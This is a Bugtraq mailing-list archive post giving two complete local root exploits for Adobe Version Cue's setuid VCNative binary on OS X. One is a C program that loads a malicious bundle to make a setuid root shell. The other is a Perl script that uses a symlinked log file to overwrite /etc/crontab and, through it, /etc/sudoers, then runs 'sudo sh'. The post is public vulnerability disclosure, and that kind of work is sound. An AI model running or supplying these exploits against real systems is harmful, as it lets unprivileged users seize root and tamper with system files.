Home page logo
/

bugtraq logo Bugtraq mailing list archives

Adobe Version Cue exploits.
From: v9 <v9 () fakehalo us>
Date: Wed, 31 Aug 2005 20:21:44 -0400 (EDT)

exploits for the vulnerabilies referenced in the iDefense advisory.

---------------------- xosx-adobe-vcnative-dyld.c ----------------------

/*[ Adobe Version Cue VCNative[OSX]: local root exploit. (dyld) ]*
 *                                                               *
 * by: vade79/v9 v9 () fakehalo us (fakehalo/realhalo)              *
 *                                                               *
 * Adobe Version Cue's VCNative program allows un-privileged     *
 * local users to load arbitrary libraries("bundles") while      *
 * running setuid root.  this is done via the "-lib"             *
 * command-line option.                                          *
 *                                                               *
 * note: VCNative must connect to a valid host to be able        *
 * to get to the point where the library is loaded.  this is     *
 * automated in this exploit by listening to an arbitrary local  *
 * port and using the localhost("127.0.0.1") to connect to.      *
 *****************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define VCNATIVE_PATH "/Applications/Adobe Version Cue/tomcat/webapps"\
 "/ROOT/WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative"
#define VCNATIVE_PORT 7979
#define CC_PATH "/usr/bin/gcc"
#define BUNDLE_PATH "/tmp/xvcn_lib"
#define SUSH_PATH "/tmp/xvcn_sush"

void printe(char *,signed char);

int main(){
 signed int sock=0,so=1;
 char syscmd[4096+1];
 struct stat mod;
 struct sockaddr_in sa;
 FILE *bundle,*sush;
 /* banner. */
 printf("[*] Adobe Version Cue VCNative[OSX]: local root exploit. (dy"
 "ld)\n[*] by: vade79/v9 v9 () fakehalo us (fakehalo/realhalo)\n\n");
 /* see if we have what we need. */
 if(access(CC_PATH,X_OK))
  printe("incorrect gcc/cc path. (CC_PATH)",1);
 if(stat(VCNATIVE_PATH,&mod))
  printe("incorrect VCNative path. (VCNATIVE_PATH)",1);
 if(!(S_ISUID&mod.st_mode))
  printe("VCNative is not setuid. (VCNATIVE_PATH)",1);
 /* appease VCNative's initial connection to load the library. */
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
 setsockopt(sock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
 sa.sin_family=AF_INET;
 sa.sin_port=htons(VCNATIVE_PORT);
 sa.sin_addr.s_addr=INADDR_ANY;
 printf("[*] opening local port: %u.\n",VCNATIVE_PORT);
 if(bind(sock,(struct sockaddr *)&sa,sizeof(sa))==-1)
  printe("could not bind socket.",1);
 listen(sock,1);
 /* make the bogus library/bundle. */
 if(!(bundle=fopen(BUNDLE_PATH ".c","w")))
  printe("could not write to bundle source file.",1);
 fprintf(bundle,"void VCLibraryInit(){\n");
 fprintf(bundle," seteuid(0);\n");
 fprintf(bundle," setuid(0);\n");
 fprintf(bundle," setegid(0);\n");
 fprintf(bundle," setgid(0);\n");
 fprintf(bundle," chown(\"" SUSH_PATH "\",0,0);\n");
 fprintf(bundle," chmod(\"" SUSH_PATH "\",3145);\n");
 fprintf(bundle,"}\n");
 fprintf(bundle,"void VCLibraryExec(){}\n");
 fprintf(bundle,"void VCLibraryExit(){}\n");
 fclose(bundle);
 /* make the (to-be) rootshell. */
 if(!(sush=fopen(SUSH_PATH ".c","w")))
  printe("could not write to sush/rootshell source file.",1);
 fprintf(sush,"int main(){\n");
 fprintf(sush," seteuid(0);\n");
 fprintf(sush," setuid(0);\n");
 fprintf(sush," setegid(0);\n");
 fprintf(sush," setgid(0);\n");
 fprintf(sush," execl(\"/bin/sh\",\"sh\",0);\n");
 fprintf(sush,"}\n");
 fclose(sush);
 /* compile the bogus library/bundle. */
 snprintf(syscmd,4096,"%s %s.c -bundle -o %s.bundle",CC_PATH,
 BUNDLE_PATH,BUNDLE_PATH);
 printf("[*] system: %s\n",syscmd);
 system(syscmd);
 /* compile the (to-be) rootshell. */
 snprintf(syscmd,4096,"%s %s.c -o %s",CC_PATH,
 SUSH_PATH,SUSH_PATH);
 printf("[*] system: %s\n",syscmd);
 system(syscmd);
 /* run VCNative. (".bundle" is appended to the library path) */
 snprintf(syscmd,4096,"\"%s\" -host 127.0.0.1 -port %u -lib %s",
 VCNATIVE_PATH,VCNATIVE_PORT,BUNDLE_PATH);
 printf("[*] system: %s\n",syscmd);
 system(syscmd);
 /* clean-up. */
 unlink(BUNDLE_PATH ".c");
 unlink(BUNDLE_PATH ".bundle");
 unlink(SUSH_PATH ".c");
 shutdown(sock,2);
 close(sock);
 /* check for success. */
 if(stat(SUSH_PATH,&mod))
  printe("sush/rootshell vanished? (SUSH_PATH)",1);
 if(!(S_ISUID&mod.st_mode)||mod.st_uid){
  unlink(SUSH_PATH);
  printe("sush/rootshell is not setuid root, exploit failed.",1);
 }
 /* success. */
 printf("[*] attempting to execute rootshell... (" SUSH_PATH ")\n\n");
 system(SUSH_PATH);
 exit(0);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}


------------------------ xosx-adobe-vcnative.pl ------------------------

#!/usr/bin/perl
#
# Adobe Version Cue VCNative[OSX]: local root exploit.
#
# by: vade79/v9 v9 () fakehalo us (fakehalo/realhalo)
#
# Adobe Version Cue's VCNative program writes data to a log file in
# the current working directory while running as (setuid) root.  the
# logfile is formated as <cwd>/VCNative-<pid>.log, which is easily
# predictable.  you may link this file to any file on the system
# and overwrite its contents.  use of the "-host" option (with
# "-port") will allow user-supplied data to be injected into the
# file.
#
# This exploit works by overwriting /etc/crontab with
# '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
# log garbage.  within a short period of time crontab will overwrite
# /etc/sudoers and "sudo sh" to root is possible.  this method is used
# because direct overwriting of /etc/sudoers will cause sudo to exit
# with configuration errors due to the log garbage, whereas crontab
# will ignore it. (this exploit requires both cron to be running and
# sudo to exist--this is generally default osx)

use POSIX;

$vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
 "WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative";
$vcn_pid=($$ + 1);
$vcn_cwd="/tmp";
$vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid\.log";
$ovrfile="/etc/crontab";
$ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\ () fakehalo us (fakehalo/realhalo)\n\n");
if(!-f $vcn_path){
 pexit("VCNative binary doesn't appear to exist");
}
if(!-f"/etc/crontab"||!-f"/etc/sudoers"){
 pexit("/etc/crontab and /etc/sudoers are required for this to work");
}
print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n");
symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
@ast=stat($ovrfile);
print("[*] running VCNative...\n");
system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\"");
print("[*] removing $vcn_tempfile...\n");
unlink($vcn_tempfile);
@st=stat($ovrfile);
if($st[7]==$ast[7]&&$st[9]==$ast[9]){
 pexit("$ovrfile was not modified, exploit failed");
}
else{
 print("[*] $ovrfile was overwritten successfully...\n");
}
print("[*] waiting for crontab to change /etc/sudoers...\n");
@ast= () st=stat("/etc/sudoers");
while($st[7]==$ast[7]&&$st[9]==$ast[9]){
 sleep(1);
 @ast=stat("/etc/sudoers");
}
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");
exit(0);


  By Date           By Thread  

Current thread:
  • Adobe Version Cue exploits. v9 (Sep 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]